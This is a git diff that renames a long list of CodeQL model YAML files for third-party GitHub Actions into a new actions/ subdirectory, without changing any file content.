diff --git a/ql/lib/ext/manual/asdf-vm_actions.model.yml b/actions/ql/lib/ext/manual/asdf-vm_actions.model.yml
similarity index 100%
rename from ql/lib/ext/manual/asdf-vm_actions.model.yml
rename to actions/ql/lib/ext/manual/asdf-vm_actions.model.yml
diff --git a/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml b/actions/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml
rename to actions/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml
diff --git a/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml b/actions/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml
rename to actions/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml
diff --git a/ql/lib/ext/manual/aszc_change-string-case-action.model.yml b/actions/ql/lib/ext/manual/aszc_change-string-case-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/aszc_change-string-case-action.model.yml
rename to actions/ql/lib/ext/manual/aszc_change-string-case-action.model.yml
diff --git a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml b/actions/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml
rename to actions/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml
diff --git a/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml b/actions/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml
similarity index 100%
rename from ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml
rename to actions/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml
diff --git a/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml b/actions/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml
rename to actions/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml
diff --git a/ql/lib/ext/manual/azure_cli.model.yml b/actions/ql/lib/ext/manual/azure_cli.model.yml
similarity index 100%
rename from ql/lib/ext/manual/azure_cli.model.yml
rename to actions/ql/lib/ext/manual/azure_cli.model.yml
diff --git a/ql/lib/ext/manual/azure_powershell.model.yml b/actions/ql/lib/ext/manual/azure_powershell.model.yml
similarity index 100%
rename from ql/lib/ext/manual/azure_powershell.model.yml
rename to actions/ql/lib/ext/manual/azure_powershell.model.yml
diff --git a/ql/lib/ext/manual/bahmutov_npm-install.model.yml b/actions/ql/lib/ext/manual/bahmutov_npm-install.model.yml
similarity index 100%
rename from ql/lib/ext/manual/bahmutov_npm-install.model.yml
rename to actions/ql/lib/ext/manual/bahmutov_npm-install.model.yml
diff --git a/ql/lib/ext/manual/blackducksoftware_github-action.model.yml b/actions/ql/lib/ext/manual/blackducksoftware_github-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/blackducksoftware_github-action.model.yml
rename to actions/ql/lib/ext/manual/blackducksoftware_github-action.model.yml
diff --git a/ql/lib/ext/manual/bobheadxi_deployments.model.yml b/actions/ql/lib/ext/manual/bobheadxi_deployments.model.yml
similarity index 100%
rename from ql/lib/ext/manual/bobheadxi_deployments.model.yml
rename to actions/ql/lib/ext/manual/bobheadxi_deployments.model.yml
diff --git a/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml b/actions/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml
rename to actions/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml
diff --git a/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml b/actions/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml
rename to actions/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml
diff --git a/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml b/actions/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml
rename to actions/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml
diff --git a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml b/actions/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml
similarity index 100%
rename from ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml
rename to actions/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml
diff --git a/ql/lib/ext/manual/cachix_cachix-action.model.yml b/actions/ql/lib/ext/manual/cachix_cachix-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/cachix_cachix-action.model.yml
rename to actions/ql/lib/ext/manual/cachix_cachix-action.model.yml
diff --git a/ql/lib/ext/manual/changesets_action.model.yml b/actions/ql/lib/ext/manual/changesets_action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/changesets_action.model.yml
rename to actions/ql/lib/ext/manual/changesets_action.model.yml
diff --git a/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml b/actions/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/cloudflare_wrangler-action.model.yml
rename to actions/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml
diff --git a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml b/actions/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml
similarity index 100%
rename from ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml
rename to actions/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml
diff --git a/ql/lib/ext/manual/coursier_cache-action.model.yml b/actions/ql/lib/ext/manual/coursier_cache-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/coursier_cache-action.model.yml
rename to actions/ql/lib/ext/manual/coursier_cache-action.model.yml
diff --git a/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml b/actions/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml
similarity index 100%
rename from ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml
rename to actions/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml
diff --git a/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml b/actions/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml
similarity index 100%
rename from ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml
rename to actions/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml
diff --git a/ql/lib/ext/manual/csexton_release-asset-action.model.yml b/actions/ql/lib/ext/manual/csexton_release-asset-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/csexton_release-asset-action.model.yml
rename to actions/ql/lib/ext/manual/csexton_release-asset-action.model.yml
diff --git a/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml b/actions/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml
rename to actions/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml
diff --git a/ql/lib/ext/manual/cypress-io_github-action.model.yml b/actions/ql/lib/ext/manual/cypress-io_github-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/cypress-io_github-action.model.yml
rename to actions/ql/lib/ext/manual/cypress-io_github-action.model.yml
diff --git a/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml b/actions/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml
similarity index 100%
rename from ql/lib/ext/manual/dailydotdev_action-devcard.model.yml
rename to actions/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml
diff --git a/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml b/actions/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml
rename to actions/ql/lib/ext/manual/danielpalme_reportgenerator-github-action.model.yml
diff --git a/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml b/actions/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml
similarity index 100%
rename from ql/lib/ext/manual/daspn_private-actions-checkout.model.yml
rename to actions/ql/lib/ext/manual/daspn_private-actions-checkout.model.yml
diff --git a/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml b/actions/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml
similarity index 100%
rename from ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml
rename to actions/ql/lib/ext/manual/dawidd6_action-ansible-playbook.model.yml
diff --git a/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml b/actions/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml
similarity index 100%
rename from ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml
rename to actions/ql/lib/ext/manual/dawidd6_action-download-artifact.model.yml
diff --git a/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml b/actions/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml
similarity index 100%
rename from ql/lib/ext/manual/delaguardo_setup-clojure.model.yml
rename to actions/ql/lib/ext/manual/delaguardo_setup-clojure.model.yml
diff --git a/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml b/actions/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml
rename to actions/ql/lib/ext/manual/determinatesystems_magic-nix-cache-action.model.yml
diff --git a/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml b/actions/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml
similarity index 100%
rename from ql/lib/ext/manual/devorbitus_yq-action-output.model.yml
rename to actions/ql/lib/ext/manual/devorbitus_yq-action-output.model.yml
diff --git a/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml b/actions/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml
similarity index 100%
rename from ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml
rename to actions/ql/lib/ext/manual/docker-practice_actions-setup-docker.model.yml
diff --git a/ql/lib/ext/manual/docker_build-push-action.model.yml b/actions/ql/lib/ext/manual/docker_build-push-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/docker_build-push-action.model.yml
rename to actions/ql/lib/ext/manual/docker_build-push-action.model.yml
diff --git a/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml b/actions/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml
similarity index 100%
rename from ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml
rename to actions/ql/lib/ext/manual/dsfx3d_action-extract-unique-matches.model.yml
diff --git a/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml b/actions/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
similarity index 100%
rename from ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
rename to actions/ql/lib/ext/manual/eficode_resolve-pr-refs.model.yml
diff --git a/ql/lib/ext/manual/endbug_latest-tag.model.yml b/actions/ql/lib/ext/manual/endbug_latest-tag.model.yml
similarity index 100%
rename from ql/lib/ext/manual/endbug_latest-tag.model.yml
rename to actions/ql/lib/ext/manual/endbug_latest-tag.model.yml
diff --git a/ql/lib/ext/manual/expo_expo-github-action.model.yml b/actions/ql/lib/ext/manual/expo_expo-github-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/expo_expo-github-action.model.yml
rename to actions/ql/lib/ext/manual/expo_expo-github-action.model.yml
diff --git a/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml b/actions/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml
similarity index 100%
rename from ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml
rename to actions/ql/lib/ext/manual/firebaseextended_action-hosting-deploy.model.yml
diff --git a/ql/lib/ext/manual/frabert_replace-string-action.model.yml b/actions/ql/lib/ext/manual/frabert_replace-string-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/frabert_replace-string-action.model.yml
rename to actions/ql/lib/ext/manual/frabert_replace-string-action.model.yml
diff --git a/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml b/actions/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml
rename to actions/ql/lib/ext/manual/franzdiebold_github-env-vars-action.model.yml
diff --git a/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml b/actions/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml
rename to actions/ql/lib/ext/manual/gabrielbb_xvfb-action.model.yml
diff --git a/ql/lib/ext/manual/game-ci_unity-builder.model.yml b/actions/ql/lib/ext/manual/game-ci_unity-builder.model.yml
similarity index 100%
rename from ql/lib/ext/manual/game-ci_unity-builder.model.yml
rename to actions/ql/lib/ext/manual/game-ci_unity-builder.model.yml
diff --git a/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml b/actions/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml
similarity index 100%
rename from ql/lib/ext/manual/game-ci_unity-test-runner.model.yml
rename to actions/ql/lib/ext/manual/game-ci_unity-test-runner.model.yml
diff --git a/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml b/actions/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml
similarity index 100%
rename from ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml
rename to actions/ql/lib/ext/manual/gautamkrishnar_blog-post-workflow.model.yml
diff --git a/ql/lib/ext/manual/getsentry_action-release.model.yml b/actions/ql/lib/ext/manual/getsentry_action-release.model.yml
similarity index 100%
rename from ql/lib/ext/manual/getsentry_action-release.model.yml
rename to actions/ql/lib/ext/manual/getsentry_action-release.model.yml
diff --git a/ql/lib/ext/manual/github_codeql-action.model.yml b/actions/ql/lib/ext/manual/github_codeql-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/github_codeql-action.model.yml
rename to actions/ql/lib/ext/manual/github_codeql-action.model.yml
diff --git a/ql/lib/ext/manual/go-semantic-release_action.model.yml b/actions/ql/lib/ext/manual/go-semantic-release_action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/go-semantic-release_action.model.yml
rename to actions/ql/lib/ext/manual/go-semantic-release_action.model.yml
diff --git a/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml b/actions/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/golangci_golangci-lint-action.model.yml
rename to actions/ql/lib/ext/manual/golangci_golangci-lint-action.model.yml
diff --git a/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml b/actions/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml
similarity index 100%
rename from ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml
rename to actions/ql/lib/ext/manual/gonuit_heroku-docker-deploy.model.yml
diff --git a/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml b/actions/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml
rename to actions/ql/lib/ext/manual/goreleaser_goreleaser-action.model.yml
diff --git a/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml b/actions/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
similarity index 100%
rename from ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
rename to actions/ql/lib/ext/manual/gotson_pull-request-comment-branch.model.yml
diff --git a/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml b/actions/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml
rename to actions/ql/lib/ext/manual/gr2m_create-or-update-pull-request-action.model.yml
diff --git a/ql/lib/ext/manual/gradle_gradle-build-action.model.yml b/actions/ql/lib/ext/manual/gradle_gradle-build-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/gradle_gradle-build-action.model.yml
rename to actions/ql/lib/ext/manual/gradle_gradle-build-action.model.yml
diff --git a/ql/lib/ext/manual/haya14busa_action-cond.model.yml b/actions/ql/lib/ext/manual/haya14busa_action-cond.model.yml
similarity index 100%
rename from ql/lib/ext/manual/haya14busa_action-cond.model.yml
rename to actions/ql/lib/ext/manual/haya14busa_action-cond.model.yml
diff --git a/ql/lib/ext/manual/hexlet_project-action.model.yml b/actions/ql/lib/ext/manual/hexlet_project-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/hexlet_project-action.model.yml
rename to actions/ql/lib/ext/manual/hexlet_project-action.model.yml
diff --git a/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml b/actions/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml
similarity index 100%
rename from ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml
rename to actions/ql/lib/ext/manual/ilammy_msvc-dev-cmd.model.yml
diff --git a/ql/lib/ext/manual/ilammy_setup-nasm.model.yml b/actions/ql/lib/ext/manual/ilammy_setup-nasm.model.yml
similarity index 100%
rename from ql/lib/ext/manual/ilammy_setup-nasm.model.yml
rename to actions/ql/lib/ext/manual/ilammy_setup-nasm.model.yml
diff --git a/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml b/actions/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml
similarity index 100%
rename from ql/lib/ext/manual/imjohnbo_issue-bot.model.yml
rename to actions/ql/lib/ext/manual/imjohnbo_issue-bot.model.yml
diff --git a/ql/lib/ext/manual/iterative_setup-cml.model.yml b/actions/ql/lib/ext/manual/iterative_setup-cml.model.yml
similarity index 100%
rename from ql/lib/ext/manual/iterative_setup-cml.model.yml
rename to actions/ql/lib/ext/manual/iterative_setup-cml.model.yml
diff --git a/ql/lib/ext/manual/iterative_setup-dvc.model.yml b/actions/ql/lib/ext/manual/iterative_setup-dvc.model.yml
similarity index 100%
rename from ql/lib/ext/manual/iterative_setup-dvc.model.yml
rename to actions/ql/lib/ext/manual/iterative_setup-dvc.model.yml
diff --git a/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml b/actions/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml
rename to actions/ql/lib/ext/manual/jamesives_github-pages-deploy-action.model.yml
diff --git a/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml b/actions/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml
similarity index 100%
rename from ql/lib/ext/manual/jitterbit_get-changed-files.model.yml
rename to actions/ql/lib/ext/manual/jitterbit_get-changed-files.model.yml
diff --git a/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml b/actions/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml
rename to actions/ql/lib/ext/manual/johnnymorganz_stylua-action.model.yml
diff --git a/ql/lib/ext/manual/jsdaniell_create-json.model.yml b/actions/ql/lib/ext/manual/jsdaniell_create-json.model.yml
similarity index 100%
rename from ql/lib/ext/manual/jsdaniell_create-json.model.yml
rename to actions/ql/lib/ext/manual/jsdaniell_create-json.model.yml
diff --git a/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml b/actions/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml
similarity index 100%
rename from ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml
rename to actions/ql/lib/ext/manual/jsmith_changes-since-last-tag.model.yml
diff --git a/ql/lib/ext/manual/jurplel_install-qt-action.model.yml b/actions/ql/lib/ext/manual/jurplel_install-qt-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/jurplel_install-qt-action.model.yml
rename to actions/ql/lib/ext/manual/jurplel_install-qt-action.model.yml
diff --git a/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml b/actions/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml
similarity index 100%
rename from ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml
rename to actions/ql/lib/ext/manual/jwalton_gh-ecr-push.model.yml
diff --git a/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml b/actions/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml
similarity index 100%
rename from ql/lib/ext/manual/kaisugi_action-regex-match.model.yml
rename to actions/ql/lib/ext/manual/kaisugi_action-regex-match.model.yml
diff --git a/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml b/actions/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml
rename to actions/ql/lib/ext/manual/karpikpl_list-changed-files-action.model.yml
diff --git a/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml b/actions/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml
similarity index 100%
rename from ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml
rename to actions/ql/lib/ext/manual/khan_pull-request-comment-trigger.model.yml
diff --git a/ql/lib/ext/manual/knu_changed-files.model.yml b/actions/ql/lib/ext/manual/knu_changed-files.model.yml
similarity index 100%
rename from ql/lib/ext/manual/knu_changed-files.model.yml
rename to actions/ql/lib/ext/manual/knu_changed-files.model.yml
diff --git a/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml b/actions/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml
rename to actions/ql/lib/ext/manual/larsoner_circleci-artifacts-redirector-action.model.yml
diff --git a/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml b/actions/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml
similarity index 100%
rename from ql/lib/ext/manual/leafo_gh-actions-lua.model.yml
rename to actions/ql/lib/ext/manual/leafo_gh-actions-lua.model.yml
diff --git a/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml b/actions/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml
similarity index 100%
rename from ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml
rename to actions/ql/lib/ext/manual/leafo_gh-actions-luarocks.model.yml
diff --git a/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml b/actions/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml
similarity index 100%
rename from ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml
rename to actions/ql/lib/ext/manual/lots0logs_gh-action-get-changed-files.model.yml
diff --git a/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml b/actions/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml
similarity index 100%
rename from ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml
rename to actions/ql/lib/ext/manual/lucasbento_auto-close-issues.model.yml
diff --git a/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml b/actions/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml
similarity index 100%
rename from ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml
rename to actions/ql/lib/ext/manual/luizfelipelaviola_parse-plain-dotenv.model.yml
diff --git a/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml b/actions/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml
similarity index 100%
rename from ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml
rename to actions/ql/lib/ext/manual/mad9000_actions-find-and-replace-string.model.yml
diff --git a/ql/lib/ext/manual/magefile_mage-action.model.yml b/actions/ql/lib/ext/manual/magefile_mage-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/magefile_mage-action.model.yml
rename to actions/ql/lib/ext/manual/magefile_mage-action.model.yml
diff --git a/ql/lib/ext/manual/maierj_fastlane-action.model.yml b/actions/ql/lib/ext/manual/maierj_fastlane-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/maierj_fastlane-action.model.yml
rename to actions/ql/lib/ext/manual/maierj_fastlane-action.model.yml
diff --git a/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml b/actions/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml
similarity index 100%
rename from ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml
rename to actions/ql/lib/ext/manual/manusa_actions-setup-minikube.model.yml
diff --git a/ql/lib/ext/manual/marocchino_on_artifact.model.yml b/actions/ql/lib/ext/manual/marocchino_on_artifact.model.yml
similarity index 100%
rename from ql/lib/ext/manual/marocchino_on_artifact.model.yml
rename to actions/ql/lib/ext/manual/marocchino_on_artifact.model.yml
diff --git a/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml b/actions/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml
similarity index 100%
rename from ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml
rename to actions/ql/lib/ext/manual/martinhaintz_ga-file-list.model.yml
diff --git a/ql/lib/ext/manual/mattdavis0351_actions.model.yml b/actions/ql/lib/ext/manual/mattdavis0351_actions.model.yml
similarity index 100%
rename from ql/lib/ext/manual/mattdavis0351_actions.model.yml
rename to actions/ql/lib/ext/manual/mattdavis0351_actions.model.yml
diff --git a/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml b/actions/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml
similarity index 100%
rename from ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml
rename to actions/ql/lib/ext/manual/meteorengineer_setup-meteor.model.yml
diff --git a/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml b/actions/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml
similarity index 100%
rename from ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml
rename to actions/ql/lib/ext/manual/metro-digital_setup-tools-for-waas.model.yml
diff --git a/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml b/actions/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml
similarity index 100%
rename from ql/lib/ext/manual/microsoft_setup-msbuild.model.yml
rename to actions/ql/lib/ext/manual/microsoft_setup-msbuild.model.yml
diff --git a/ql/lib/ext/manual/mikefarah_yq.model.yml b/actions/ql/lib/ext/manual/mikefarah_yq.model.yml
similarity index 100%
rename from ql/lib/ext/manual/mikefarah_yq.model.yml
rename to actions/ql/lib/ext/manual/mikefarah_yq.model.yml
diff --git a/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml b/actions/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml
similarity index 100%
rename from ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml
rename to actions/ql/lib/ext/manual/mishakav_pytest-coverage-comment.model.yml
diff --git a/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml b/actions/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml
similarity index 100%
rename from ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml
rename to actions/ql/lib/ext/manual/mr-smithers-excellent_docker-build-push.model.yml
diff --git a/ql/lib/ext/manual/msys2_setup-msys2.model.yml b/actions/ql/lib/ext/manual/msys2_setup-msys2.model.yml
similarity index 100%
rename from ql/lib/ext/manual/msys2_setup-msys2.model.yml
rename to actions/ql/lib/ext/manual/msys2_setup-msys2.model.yml
diff --git a/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml b/actions/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml
similarity index 100%
rename from ql/lib/ext/manual/mxschmitt_action-tmate.model.yml
rename to actions/ql/lib/ext/manual/mxschmitt_action-tmate.model.yml
diff --git a/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml b/actions/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml
similarity index 100%
rename from ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml
rename to actions/ql/lib/ext/manual/mymindstorm_setup-emsdk.model.yml
diff --git a/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml b/actions/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml
similarity index 100%
rename from ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml
rename to actions/ql/lib/ext/manual/nanasess_setup-chromedriver.model.yml
diff --git a/ql/lib/ext/manual/nanasess_setup-php.model.yml b/actions/ql/lib/ext/manual/nanasess_setup-php.model.yml
similarity index 100%
rename from ql/lib/ext/manual/nanasess_setup-php.model.yml
rename to actions/ql/lib/ext/manual/nanasess_setup-php.model.yml
diff --git a/ql/lib/ext/manual/nick-fields_retry.model.yml b/actions/ql/lib/ext/manual/nick-fields_retry.model.yml
similarity index 100%
rename from ql/lib/ext/manual/nick-fields_retry.model.yml
rename to actions/ql/lib/ext/manual/nick-fields_retry.model.yml
diff --git a/ql/lib/ext/manual/octokit_graphql-action.model.yml b/actions/ql/lib/ext/manual/octokit_graphql-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/octokit_graphql-action.model.yml
rename to actions/ql/lib/ext/manual/octokit_graphql-action.model.yml
diff --git a/ql/lib/ext/manual/octokit_request-action.model.yml b/actions/ql/lib/ext/manual/octokit_request-action.model.yml
similarity index 100%
rename from ql/lib/ext/manual/octokit_request-action.model.yml
rename to actions/ql/lib/ext/manual/octokit_request-action.model.yml
diff --git a/ql/lib/ext/manual/olafurpg_setup-scala.model.yml b/actions/ql/lib/ext/manual/olafurpg_setup-scala.model.yml
similarity index 100%
